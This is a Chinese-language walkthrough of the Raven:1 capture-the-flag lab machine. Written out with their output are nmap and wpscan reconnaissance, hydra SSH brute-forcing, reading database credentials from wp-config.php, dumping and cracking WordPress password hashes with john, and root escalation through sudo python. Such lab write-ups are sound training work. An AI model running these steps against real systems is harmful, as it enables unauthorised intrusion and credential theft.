介绍
Raven是一台初级/中级boot2root机器。有四个标志可供查找,两种预定的获取方式。
使用VMware构建并在Virtual Box上进行测试。设置为使用NAT网络。
名称:Raven:1
日期:2018年8月14日
作者:威廉麦肯
系列:Raven
信息搜集
通过nmap查询网络信息
网络信息
1
2
3
4
5
6
7
8
9
10
11
|
$ nmap -sN 192.168.123.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 13:24 CST
Nmap scan report for Sec.lan (192.168.123.1)
Nmap scan report for 192.168.123.75
Host is up (0.00025s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
111/tcp open|filtered rpcbind
MAC Address: 08:00:27:D9:1A:26 (Oracle VirtualBox virtual NIC)
|
找到目标地址
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
$ nmap -A -p- -sS 192.168.123.75
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 13:24 CST
Nmap scan report for Raven.lan (192.168.123.75)
Host is up (0.00044s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 42655/tcp status
|_ 100024 1 48893/udp status
42655/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:D9:1A:26 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
应用信息
直接打开网站,发现是一个静态的网页,使用dirb枚举目录。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
$ dirb http://192.168.123.75
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Nov 8 13:26:25 2018
URL_BASE: http://192.168.123.75/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.123.75/ ----
==> DIRECTORY: http://192.168.123.75/css/
==> DIRECTORY: http://192.168.123.75/fonts/
==> DIRECTORY: http://192.168.123.75/img/
+ http://192.168.123.75/index.html (CODE:200|SIZE:16819)
==> DIRECTORY: http://192.168.123.75/js/
==> DIRECTORY: http://192.168.123.75/manual/
+ http://192.168.123.75/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.123.75/vendor/
==> DIRECTORY: <http://192.168.123.75/wordpress/>
|
- 发现有一个wordpress的网站,但是我打开后发现无法通过ip地址无法正常运行。
- 将报错的域名指向目标:
192.168.123.75 raven.local
- 打开
http://raven.local/
正常访问。
接下使用wpscan来枚举wordpress的信息
$ wpscan --url http://raven.local/wordpress/ --enumerate p -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.3.2
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://raven.local/wordpress/
[+] Started: Thu Nov 8 13:50:24 2018
Interesting Finding(s):
[+] http://raven.local/wordpress/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://raven.local/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
[+] Enumerating Users
Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] michael
| Detected By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] steven
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
- 发现一系列信息:比较重要的是用户
michael
和steven
,我选择尝试暴力破解ssh和wordpress的密码。
ssh爆破
将上面两个用户名保存为:icekam.txt,使用hydra爆破。
1
2
3
4
5
6
7
8
|
$ hydra -L icekam.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.123.75
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-08 13:53:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688798 login tries (l:2/p:14344399), ~1793050 tries per task
[DATA] attacking ssh://192.168.123.75:22/
[22][ssh] host: 192.168.123.75 login: michael password: michael
|
尝试登录:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
$ ssh [email protected]
The authenticity of host '192.168.123.75 (192.168.123.75)' can't be established.
ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.123.75' (ECDSA) to the list of known hosts.
[email protected]'s password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
michael@Raven:/$ ls
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
converted 'https://codeload.github.com/rebootuser/LinEnum/zip/master' (ANSI_X3.4-1968) -> 'https://codeload.github.com/rebootuser/LinEnum/zip/master' (UTF-8)
--2018-11-09 01:21:06-- https://codeload.github.com/rebootuser/LinEnum/zip/master
Resolving codeload.github.com (codeload.github.com)... 54.251.140.56, 13.250.162.133, 13.229.189.0
Connecting to codeload.github.com (codeload.github.com)|54.251.140.56|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: 'master'
master [ <=> ] 14.47K --.-KB/s in 0.09s
2018-11-09 01:21:06 (156 KB/s) - 'master' saved [14816]
michael@Raven:/tmp$ ls
master
michael@Raven:/tmp$ unzip master
Archive: master
b6e55a80654c6a701ddd5fc76f104938023cdbb4
creating: LinEnum-master/
inflating: LinEnum-master/CHANGELOG.md
inflating: LinEnum-master/CONTRIBUTORS.md
inflating: LinEnum-master/LICENSE
inflating: LinEnum-master/LinEnum.sh
inflating: LinEnum-master/README.md
michael@Raven:/tmp$ cd LinEnum-master/
michael@Raven:/tmp/LinEnum-master$ ls
CHANGELOG.md CONTRIBUTORS.md LICENSE LinEnum.sh README.md
michael@Raven:/tmp/LinEnum-master$ ./LinEnum.sh
|
提权
直接使用LinEnum,并没有什么信息,我选择切换到mysql的用户下再尝试。
mysql
打开配置文件,查询mysql用户信息
michael@Raven:/var/www/html/wordpress$ cat wp-config.php
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
登录查看用户hash:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
|
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.00 sec)
mysql> use wordpress;
Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
|
- 发现hash,将hash保存为icekamwp.txt直接使用john破解。
1
2
|
$ john icekamwp.txt
steven:pink84
|
系统
破解成功,切换用户并使用LinEnum。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
michael@Raven:/var/www/html/wordpress$ su steven
Password:
$ /bin/bash
steven@Raven:/var/www/html/wordpress$ cd /tmp
steven@Raven:/tmp$ ls
LinEnum-master master
steven@Raven:/tmp$ cd LinEnum-master/
steven@Raven:/tmp/LinEnum-master$ ls
CHANGELOG.md CONTRIBUTORS.md LICENSE LinEnum.sh README.md
steven@Raven:/tmp/LinEnum-master$ ./LinEnum.sh
[+] We can sudo without supplying a password!
Matching Defaults entries for steven on raven:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python
[+] Possible sudo pwnage!
/usr/bin/python
|
1
2
3
4
5
6
7
8
9
10
11
12
13
|
steven@Raven:/tmp/LinEnum-master$ sudo /usr/bin/python
Python 2.7.9 (default, Jun 29 2016, 13:08:31)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.system('/bin/bash')
root@Raven:/tmp/LinEnum-master## ls
CHANGELOG.md CONTRIBUTORS.md LICENSE LinEnum.sh README.md
root@Raven:/tmp/LinEnum-master## cd
root@Raven:~## ls
flag4.txt
root@Raven:~## cat flag4.txt
flag4{715dea6c055b9fe3337544932f2941ce}
|
- 成功获取到flag权限,然而搜索也没发现,很尴尬。
1
2
3
|
root@Raven:/## find -name flag*.txt
./var/www/flag2.txt
./root/flag4.txt
|
心得
这个环境比较基础,很快就能拿下来!